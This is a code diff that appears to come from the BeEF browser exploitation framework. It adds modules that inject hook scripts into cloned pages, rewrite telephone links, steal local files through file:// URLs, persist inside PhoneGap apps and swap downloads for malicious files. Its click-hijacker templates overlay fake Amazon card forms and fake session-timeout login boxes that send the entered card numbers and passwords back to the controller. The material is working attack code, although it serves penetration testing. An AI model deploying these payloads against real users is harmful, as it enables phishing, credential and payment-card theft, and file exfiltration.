+            @http_server.mount("#{mount}", interceptor.new)
+            print_info "Mounting cloned page on URL [#{mount}]"
+            @http_server.remap
+            success = true
+          else
+            print_error "Error cloning #{url}. Be sure that you don't have errors while retrieving the page with 'wget'."
+            success = false
+          end
+
+          success
+        end
+
+        private
+        # Replace </head> with <BeEF_hook></head>
+        def add_beef_hook(line)
+           line.gsub!("</head>","<script type=\"text/javascript\" src=\"#{@beef_hook}\"></script>\n</head>")
+           line
+        end
+
+        private
+        # check if the original URL can be framed. NOTE: doesn't check for framebusting code atm
+        def is_frameable(url)
+          result = true
+          uri = URI(url)
+          http = Net::HTTP.new(uri.host, uri.port)
+          if uri.scheme == "https"
+            http.use_ssl = true
+            http.verify_mode = OpenSSL::SSL::VERIFY_NONE
+          end
+          request = Net::HTTP::Get.new(uri.request_uri)
+          response = http.request(request)
+          frame_opt = response["X-Frame-Options"]
+
+          if frame_opt != nil
+            if frame_opt.casecmp("DENY") == 0 || frame_opt.casecmp("SAMEORIGIN") == 0
+              result = false
+            end
+          end
+          print_info "Page can be framed: [#{result}]"
+          result
+        end
+
+        def get_page_content(file_path)
+          file = File.open(file_path,'r')
+          cloned_page = file.read
+          file.close
+          cloned_page
+        end
+
+        def persist_page(uri, mount)
+          webcloner_db = BeEF::Core::Models::Webcloner.new(
+              :uri => uri,
+              :mount => mount
+          )
+          webcloner_db.save
+          webcloner_db
+        end
+
+      end
+    end
+  end
+end
+

modules/browser/hooked_domain/link_rewrite_tel/command.js

@@ -0,0 +1,24 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	var tel_number = "<%= @tel_number %>";
+	var selector   = "a";
+
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+beef.dom.rewriteTelLinks(tel_number, selector)+' telephone (tel) links rewritten to '+tel_number);
+
+});
+

modules/browser/hooked_domain/link_rewrite_tel/config.yaml

@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        link_rewrite_tel:
+            enable: true
+            category: ["Browser", "Hooked Domain"]
+            name: "Replace HREFs (TEL)"
+            description: "This module will rewrite all the href attributes of telephone links (ie, tel:5558585) to call a number of your choice."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]

modules/browser/hooked_domain/link_rewrite_tel/module.rb

@@ -0,0 +1,28 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Link_rewrite_tel < BeEF::Core::Command
+
+  def self.options
+    return [
+      { 'ui_label'=>'Number', 'name'=>'tel_number', 'description' => 'New telephone number', 'value'=>'5558585', 'width'=>'200px' }
+    ]
+  end
+  
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+  
+end

modules/exploits/local_host/java_payload/module.rb

@@ -16,7 +16,7 @@
 class Java_payload < BeEF::Core::Command
 
   def pre_send
-    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/java_payload/AppletReverseTCP-0.2.jar', '/anti', 'jar')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar', '/anti', 'jar')
   end
 
   def self.options

modules/misc/local_file_theft/command.js

@@ -86,6 +86,16 @@ result = '';
 							    }
 			    }
 
+    fileList['custom']=  {
+				    // user defined
+				    "discover"	:'',
+
+				    "post" 		:{
+							    'result':'<%== @target_file %>',
+							    }
+			    }
+
+
     functionList = {
 			    mac:{
 				    // OS X disovery
@@ -138,11 +148,25 @@ result = '';
 											    grabFiles(homedir,"ios")
 										    }
 									    }
-
-					    alert("ipad")
+                                        return true;
 					    }
 				    },
 
+                custom:{
+                // Grab custom stuff
+                    discover : function(){
+                                        tmp = new XMLHttpRequest()
+                                        tmp.open('get',fileList['custom']['discover'])
+                                        tmp.send()
+                                        tmp.onreadystatechange=function(){
+                                            if(tmp.readyState==4){
+                                                homedir = "file:///";
+                                                grabFiles(homedir,"custom")
+                                            }
+                                        }
+                                        return true;
+                        }
+                    },
 			    android:{
 			    // figure out what app (gmail, browser, or dolphin?) android 
 				    discover : function(){
@@ -172,19 +196,27 @@ result = '';
 
 
     function identify(){
-	    if(/.*Android.*/.test(navigator.userAgent)){
-		    return "android"
-	    } else if(/Linux.*/i.test(navigator.platform)){
-		    return "linux"
-	    } else if(/iP.*/i.test(navigator.platform)){
-		    return "ios"
-	    } else if(/.*Mac.*/i.test(navigator.userAgent)){
-		    return "mac"
-	    } else if(/.*Windows.*/i.test(navigator.userAgent)){
-		    return "windows"
-	    } else if(/.*hpwOS.*/i.test(navigator.platform)){
-		    return "webos"
-	    }
+        
+        // custom file is specified
+        if ('<%== @target_file %>' != 'autodetect') {
+            return "custom"
+
+        // determine a good file to steal based on platform
+        } else {
+            if(/.*Android.*/.test(navigator.userAgent)){
+                return "android"
+            } else if(/Linux.*/i.test(navigator.platform)){
+                return "linux"
+            } else if(/iP.*/i.test(navigator.platform)){
+                return "ios"
+            } else if(/.*Mac.*/i.test(navigator.userAgent)){
+                return "mac"
+            } else if(/.*Windows.*/i.test(navigator.userAgent)){
+                return "windows"
+            } else if(/.*hpwOS.*/i.test(navigator.platform)){
+                return "webos"
+            }
+        }
     }
 
 

modules/misc/local_file_theft/module.rb

@@ -19,6 +19,16 @@
 
 class Local_file_theft < BeEF::Core::Command
 
+  def self.options
+    return [
+        {'name' => 'target_file', 
+         'description' => 'The full path to the local file to steal e.g. file:///var/mobile/Library/AddressBook/AddressBook.sqlitedb', 
+         'ui_label' => 'Target file',
+         'value' => 'autodetect'
+         } 
+    ]
+  end
+ 
    def post_execute
     content = {}
     content['result'] = @datastore['result']

modules/phonegap/phonegap_check_connection/command.js

@@ -0,0 +1,37 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+beef.execute(function() {
+    var connection_type;
+
+    getConnectionType = function() {
+        var states = {};
+        states[Connection.UNKNOWN] = 'Unknown connection';
+        states[Connection.ETHERNET] = 'Ethernet connection';
+        states[Connection.WIFI] = 'WiFi connection';
+        states[Connection.CELL_2G] = 'Cell 2G connection';
+        states[Connection.CELL_3G] = 'Cell 3G connection';
+        states[Connection.CELL_4G] = 'Cell 4G connection';
+        states[Connection.NONE] = 'No network connection';
+        return states[navigator.network.connection.type];
+    }
+
+    try {
+      connection_type = getConnectionType();
+    } catch(e) {
+      connection_type = "Unable to determine connection type."
+    }
+
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "connection_type="+connection_type);
+});

modules/phonegap/phonegap_check_connection/config.yaml

@@ -0,0 +1,27 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+#   phonegap
+#
+beef:
+    module:
+        phonegap_check_connection:
+            enable: true
+            category: "Phonegap"
+            name: "Check connection"
+            description: "Find out connection type e.g. Wifi, 3G.."
+            authors: ["mh"]
+            target:
+                working: ["All"]

modules/phonegap/phonegap_check_connection/module.rb

@@ -0,0 +1,27 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+# phonegap
+#
+
+class Phonegap_check_connection < BeEF::Core::Command
+
+   def post_execute
+    content = {}
+    content['result'] = @datastore['result']
+    save content
+  end 
+  
+end

modules/phonegap/phonegap_detect/command.js

@@ -23,6 +23,7 @@ beef.execute(function() {
         phonegap_details = ""
         + " name: " + device.name 
         + " phonegap api: " + device.phonegap
+        + " cordova api: " + device.cordova
         + " platform: " + device.platform
         + " uuid: " + device.uuid
         + " version: " + device.version;

modules/phonegap/phonegap_persist_resume/command.js

@@ -0,0 +1,31 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+
+//
+// persist on over app's sleep/wake events
+beef.execute(function() {
+    var result;
+
+    try {
+        document.addEventListener("resume", beef_init(), false);
+        result = 'success';
+
+    } catch (e) {
+        for(var n in e) {
+            result+= n + " " + e[n] + "\n"; 
+        }
+    }
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result);
+});

modules/phonegap/phonegap_persist_resume/config.yaml

@@ -0,0 +1,27 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+
+#   persist on over app's sleep/wake events
+beef:
+    module:
+        phonegap_persist_resume:
+            enable: true
+            category: "Phonegap"
+            name: "Persist resume"
+            description: "Persist over applications sleep/wake events"
+            authors: ["mh"]
+            target:
+                working: ["All"]

modules/phonegap/phonegap_persist_resume/module.rb

@@ -0,0 +1,26 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+
+#   persist on over app's sleep/wake events
+class Phonegap_persist_resume < BeEF::Core::Command
+
+   def post_execute
+    content = {}
+    content['result'] = @datastore['result']
+    save content
+  end 
+  
+end

modules/social_engineering/lcamtuf_download/command.js

@@ -0,0 +1,37 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {	
+	var maliciousurl = '<%= @malicious_file_uri %>';
+	var realurl = '<%= @real_file_uri %>';	
+	var w;
+	var once = '<%= @do_once %>';
+
+	function doit() {
+
+		if (!beef.browser.isIE()) {
+			w = window.open('data:text/html,<meta http-equiv="refresh" content="0;URL=' + realurl + '">', 'foo');
+			setTimeout(donext, 4500);
+		}
+
+	}
+	function donext() {
+		window.open(maliciousurl, 'foo');
+		if (once != true) setTimeout(donext, 5000);
+		once = true;
+	}
+	doit();
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Command executed");
+});

modules/social_engineering/lcamtuf_download/config.yaml

@@ -0,0 +1,26 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+       lcamtuf_download:
+            enable: true
+            category: "Social Engineering"
+            name: "Lcamtuf Download"
+            description: "This module will attempt to execute a lcamtuf download.  The file will be served with an alternative <i>Content-Disposition: attachment</i> header.  For more information please refer to <a href='http://lcamtuf.blogspot.co.uk/2012/05/yes-you-can-have-fun-with-downloads.html'>http://lcamtuf.blogspot.co.uk/2012/05/yes-you-can-have-fun-with-downloads.html</a> ."
+            authors: ["Bart Leppens"]
+            target:
+                 user_notify: ["ALL"]
+                 not_working: ["IE"]

modules/social_engineering/lcamtuf_download/module.rb

@@ -0,0 +1,48 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Lcamtuf_download < BeEF::Core::Command
+  
+  # set and return all options for this module
+  def self.options
+
+    return [{
+      'name' => 'real_file_uri', 
+      'description' => 'The web accessible URI for the real file.',
+      'ui_label' => 'Real File Path',
+      'value' => 'http://get.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer_(64_bit)&os=Windows%207&browser_type=MSIE&browser_dist=OEM&d=Google_Toolbar_7.0&PID=4166869',
+      'width' => '300px' 
+      },
+      {
+      'name' => 'malicious_file_uri',
+      'description' => 'The web accessible URI for the malicious file.',
+      'ui_label' => 'Malicious File Path',
+      'value' => '',
+      'width' => '300px'
+      },
+      { 'name' => 'do_once', 'type' => 'combobox', 'ui_label' => 'Run Once', 'store_type' => 'arraystore',
+          'store_fields' => ['do_once'], 'store_data' => [['false'],['true']],
+          'valueField' => 'do_once', 'displayField' => 'do_once', 'mode' => 'local', 'value' => 'false', 'autoWidth' => true
+      }]
+  end
+
+  def post_execute     
+    content = {}
+    content['result'] = @datastore['result']          
+    
+    save content   
+  end
+  
+end

modules/social_engineering/simple_hijacker/command.js

@@ -0,0 +1,43 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+
+hijack = function(){
+    function send(answer){
+      beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);	
+    }
+    <% target = @targets.split(',') %>   
+    $j('a').click(function(e) {
+      e.preventDefault();
+      if ($j(this).attr('href') != '')
+      { 
+        if( <% target.each{ |href| %> $j(this).attr('href').indexOf("<%=href%>") != -1 <% if href != target.last %> || <% else %> ) <% end %><% } %>{			
+          <%
+              tplpath = "#{$root_dir}/modules/social_engineering/simple_hijacker/templates/#{@choosetmpl}.js"
+              file = File.open(tplpath, "r")
+              @template = file.read
+          %>
+          
+          <%= @template %>
+          beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Template "<%= @choosetmpl %>" applied to '+$j(this).attr('href'));
+        }
+      }
+    });
+}
+
+beef.execute(function() {
+	hijack();
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Hijacker ready, now waits for user action');
+});

modules/social_engineering/simple_hijacker/config.yaml

@@ -0,0 +1,26 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        simple_hijacker:
+            enable: true
+            category: "Social Engineering"
+            name: "Simple Hijacker"
+            description: "Hijack clicks on links to display what you want."
+            templates: ["credential", "confirmbox", "amazon", "chromecertbeggar"]
+            authors: ["gallypette"]
+            target:
+                user_notify: ['ALL']

modules/social_engineering/simple_hijacker/module.rb

@@ -0,0 +1,48 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Simple_hijacker < BeEF::Core::Command
+
+  def self.options
+
+    config = BeEF::Core::Configuration.instance
+    @templates = config.get('beef.module.simple_hijacker.templates')
+
+    # Defines which domains to target
+    data = []
+    data.push({'name' =>'targets', 'description' =>'list domains you want to hijack - separed by ,', 'ui_label'=>'Targetted domains', 'value' => 'beef'})
+    
+    # We'll then list all templates available 
+    tmptpl = []
+    @templates.each{ |template|
+      tplpath = "#{$root_dir}/modules/social_engineering/simple_hijacker/templates/#{template}.js"
+        raise "Invalid template path for command template #{template}" if not File.exists?(tplpath)
+      tmptpl<<[ template]
+    }
+ 
+    data.push({'name' => 'choosetmpl', 'type' => 'combobox', 'ui_label' => 'Template to use', 'store_type' => 'arraystore', 'store_fields' => ['tmpl'], 'store_data' => tmptpl, 'valueField' => 'tmpl', 'displayField' => 'tmpl' , 'mode' => 'local', 'emptyText' => "Choose a template"})
+      
+    return data
+  end
+  
+  #
+  # This method is being called when a zombie sends some
+  # data back to the framework.
+  #
+  def post_execute
+    save({'answer' => @datastore['answer']})
+  end
+  
+end

modules/social_engineering/simple_hijacker/templates/amazon.js

@@ -0,0 +1,28 @@
+  beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
+	$j(document).attr('title', $j(this).html());
+	document.body.scroll = 'no';
+	document.documentElement.style.overflow = 'hidden';
+	
+	collect = function(){
+	  answer = "";
+		$j(":input").each(function() {
+		  answer += " "+$j(this).attr("name")+":"+$j(this).val();
+		});
+		send(answer);
+	}
+	
+		// floating div
+	function writediv() {
+		sneakydiv = document.createElement('div');
+		sneakydiv.setAttribute('id', 'hax');
+		sneakydiv.setAttribute('display', 'block');
+		sneakydiv.setAttribute('style', 'width:60%;position:fixed; top:200px; left:220px; z-index:51;background-color:#FFFFFF;opacity:1;font-family: verdana,arial,helvetica,sans-serif;font-size: small;');
+		document.body.appendChild(sneakydiv);
+		sneakydiv.innerHTML= '<div style="margin:5px;">Your credit card details expired, please enter your new credit card credential to continue shopping- <br> <b>Changes made to your payment methods will not affect orders you have already placed. </b></div><table cellspacing=0 cellpadding=0 border=0 width="100%"><tbody><tr><td valign=bottom><b class=h1><nobr><a href="#" style="font-size: medium;font-family: verdana,arial,helvetica;color: #004B91;text-decoration: underline;cursor: auto">Your Account</a></nobr>&gt;</b><h1 class=h1 style="display: inline; color: #E47911; font-size: medium;font-family: verdana,arial;font-weight: bold"><b class=h1><nobr>Add a Credit or Debit Card</nobr></b></h1></td></table><div width="99%" style="border: 2px solid #DDDDCC; -webkit-border-radius: 10px;border-radius: 10px"><table width="100%" border=0 cellspacing=0 cellpadding=0 align=center><tbody><tr><td valign=middle width="20%" nowrap=nowrap height=28><font color="#660000"><b class=sans>&nbsp; Edit your payment method:</b></font></td><tr><td valign=middle width="100%" nowrap=nowrap><table><tbody><tr><td align=right><b><font face="verdana,arial,helvetica" size=-1>Cardholder Name:</font></b></td><td><input name=name onchange="collect();" size=25 maxlength=60><br></td><tr><td align=right><b><font face="verdana,arial,helvetica" size=-1>Exp. Date:</font></b></td><td><select onchange="collect();" name=newCreditCardMonth title=Month id=newCreditCardMonth><option value=01>01<option value=02>02<option value=03>03<option value=04>04<option value=05>05<option value=06>06<option value=07>07<option value=08>08<option value=09>09<option value=10>10<option value=11 selected>11<option value=12>12</select>&nbsp;<select onchange="collect();" name=newCreditCardYear title=Year id=newCreditCardYear><option value=2011 selected>2011<option value=2012>2012<option value=2013>2013<option value=2014>2014<option value=2015>2015<option value=2016>2016<option value=2017>2017<option value=2018>2018<option value=2019>2019<option value=2020>2020<option value=2021>2021<option value=2022>2022<option value=2023>2023<option value=2024>2024<option value=2025>2025<option value=2026>2026<option value=2027>2027<option value=2028>2028<option value=2029>2029<option value=2030>2030<option value=2031>2031<option value=2032>2032<option value=2033>2033<option value=2034>2034<option value=2035>2035<option value=2036>2036<option value=2037>2037</select></td><tr><td align=right><b><font face="verdana,arial,helvetica" size=-1>Number:</font></b></td><td><input name=creditcard onchange="collect();" size=16 maxlength=16><br></td><tr><td colspan=2><hr width="100%" noshade=noshade size=1></td><tr><td align=right></td><td><div id="confirm" style="cursor: hand; border: 2px solid #ffcc55; -webkit-border-radius: 10px;border-radius: 10px;font-family: verdana,arial;font-weight: bold" align=center width="20%"><font face="verdana,arial,helvetica" size=-1>Confirm</font></div></td></table></td></table></div>';
+	}
+
+	writediv();
+	
+	$j("#confirm").click(function () {
+      $j('#hax').remove();
+  });

modules/social_engineering/simple_hijacker/templates/confirmbox.js

@@ -0,0 +1,10 @@
+var answer = confirm("Do you really want to leave us ??")
+if (answer){
+	alert("Okay :(")
+	send("User chose to leave.");
+	window.location = $j(this).attr('href');
+}
+else{
+	alert("Okay enjoy ")
+	send("User chose to stay.");
+}

modules/social_engineering/simple_hijacker/templates/credential.js

@@ -0,0 +1,105 @@
+	imgr = "http://0.0.0.0:3000/ui/media/images/beef.png";
+	var answer= '';
+	
+	beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
+	$j(document).attr('title', $j(this).html());
+	document.body.scroll = 'no';
+	document.documentElement.style.overflow = 'hidden';
+	
+	// set up darkening
+	function grayOut(vis, options) {
+	  // Pass true to gray out screen, false to ungray
+	  // options are optional.  This is a JSON object with the following (optional) properties
+	  // opacity:0-100         // Lower number = less grayout higher = more of a blackout 
+	  // zindex: #             // HTML elements with a higher zindex appear on top of the gray out
+	  // bgcolor: (#xxxxxx)    // Standard RGB Hex color code
+	  // grayOut(true, {'zindex':'50', 'bgcolor':'#0000FF', 'opacity':'70'});
+	  // Because options is JSON opacity/zindex/bgcolor are all optional and can appear
+	  // in any order.  Pass only the properties you need to set.
+	  var options = options || {};
+	  var zindex = options.zindex || 50;
+	  var opacity = options.opacity || 70;
+	  var opaque = (opacity / 100);
+	  var bgcolor = options.bgcolor || '#000000';
+	  var dark=document.getElementById('darkenScreenObject');
+	  if (!dark) {
+	    // The dark layer doesn't exist, it's never been created.  So we'll
+	    // create it here and apply some basic styles.
+	    // If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
+	    var tbody = document.getElementsByTagName("body")[0];
+	    var tnode = document.createElement('div');           // Create the layer.
+	        tnode.style.position='absolute';                 // Position absolutely
+	        tnode.style.top='0px';                           // In the top
+	        tnode.style.left='0px';                          // Left corner of the page
+	        tnode.style.overflow='hidden';                   // Try to avoid making scroll bars            
+	        tnode.style.display='none';                      // Start out Hidden
+	        tnode.id='darkenScreenObject';                   // Name it so we can find it later
+	    tbody.appendChild(tnode);                            // Add it to the web page
+	    dark=document.getElementById('darkenScreenObject');  // Get the object.
+	  }
+	  if (vis) {
+	    // Calculate the page width and height 
+	    if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
+	        var pageWidth = document.body.scrollWidth+'px';
+	        var pageHeight = document.body.scrollHeight+'px';
+	    } else if( document.body.offsetWidth ) {
+	      var pageWidth = document.body.offsetWidth+'px';
+	      var pageHeight = document.body.offsetHeight+'px';
+	    } else {
+	       var pageWidth='100%';
+	       var pageHeight='100%';
+	    }
+	    //set the shader to cover the entire page and make it visible.
+	    dark.style.opacity=opaque;
+	    dark.style.MozOpacity=opaque;
+	    dark.style.filter='alpha(opacity='+opacity+')';
+	    dark.style.zIndex=zindex;
+	    dark.style.backgroundColor=bgcolor;
+	    dark.style.width= pageWidth;
+	    dark.style.height= pageHeight;
+	    dark.style.display='block';
+	  } else {
+	     dark.style.display='none';
+	  }
+	}
+
+	// function to send response
+	function win(){
+		document.getElementById('hax').innerHtml='<h2>Thank you for re-authenticating, you will now be returned to the application</h2>';
+		answer = document.getElementById('uname').value+':'+document.getElementById('pass').value;
+	}
+
+	// perform darkening
+	grayOut(true);
+
+	function checker(){
+		processval = document.body.lastChild.getElementsByTagName("input")[2].value;
+		if (processval == "Processing..") {
+			uname = document.body.lastChild.getElementsByTagName("input")[0].value;
+			pass = document.body.lastChild.getElementsByTagName("input")[1].value;
+			answer = uname+":"+pass
+  		send(answer);
+			// set lastchild invisible
+			document.body.lastChild.setAttribute('style','display:none');
+			// lighten screen
+			grayOut(false);
+			clearInterval(credgrabber);
+			$j('#hax').remove();
+			$j('#darkenScreenObject').remove();
+		}
+	}
+
+
+	// floating div
+	function writeit() {
+		sneakydiv = document.createElement('div');
+		sneakydiv.setAttribute('id', 'hax');
+		sneakydiv.setAttribute('style', 'width:400px;height:320px;position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000');
+		sneakydiv.setAttribute('align', 'center');
+		document.body.appendChild(sneakydiv);
+		sneakydiv.innerHTML= '<br><img src=\''+imgr+'\' width=\'80px\' height\'80px\' /><h2>Your session has timed out!</h2><p>For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.</p><table border=\'0\'><tr><td>Username:</td><td><input type=\'text\' name=\'uname\' id=\'uname\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"lul\").value=\"Processing..\";\'></input></td></td><tr><td>Password:</td><td><input type=\'password\' name=\'pass\' id=\'pass\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"lul\").value=\"Processing..\";\'></input></td></tr></table><br><input type=\'button\' name=\'lul\' id=\'lul\' onClick=\'document.getElementById(\"lul\").value=\"Processing..\";\' value=\'Continue\'>';
+		credgrabber = setInterval(checker,1000);
+
+	}
+	
+	writeit();